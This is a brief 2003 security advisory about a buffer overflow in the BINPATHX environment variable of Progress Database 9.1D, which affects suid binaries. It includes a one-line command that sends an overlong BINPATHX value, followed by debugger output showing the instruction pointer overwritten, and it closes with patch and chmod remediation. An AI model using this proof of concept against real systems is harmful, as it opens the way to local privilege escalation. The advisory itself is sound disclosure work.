16th Apr 2003 [SBWID-6160]
COMMAND
	Progress Database unchecked buffer in BINPATHX leads to overflow
SYSTEMS AFFECTED
	v9.1D up to 9.1D05
PROBLEM
	In  Secure  Network  Operations,  Inc.  Strategic  Reconnaissance   Team
	advisory SRT2003-04-15-1029 [http://www.secnetops.com]:
	With version 9.1D several things have changed in the Progress  codebase.
	One such change is the addition of the BINPATHX variable. At  the  first
	glance the BINPATHX variable appears to tell Progress binaries where  to
	find shared library files and other  installation  files.  Unfortunately
	while reading the variable no bounds checking is done.  If  an  attacker
	supplies enough data an overflow will occur  thus  overwriting  critical
	memory registers including the eip.
	Debugger output
	
	[email protected] rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
	[email protected] rootme $ gdb -q /usr/dlc/bin/_proapsv
	(gdb) r
	Starting program: /usr/dlc/bin/_proapsv
	Program received signal SIGSEGV, Segmentation fault.
	0x41414141 in ?? ()
	(gdb) bt
	#0  0x41414141 in ?? ()
	Cannot access memory at address 0x41414141
	
SOLUTION
	install 9.1D05 or chmod -s all suid binaries
	
	http://www.progress.com/patches/patchlst/91D-156v.htm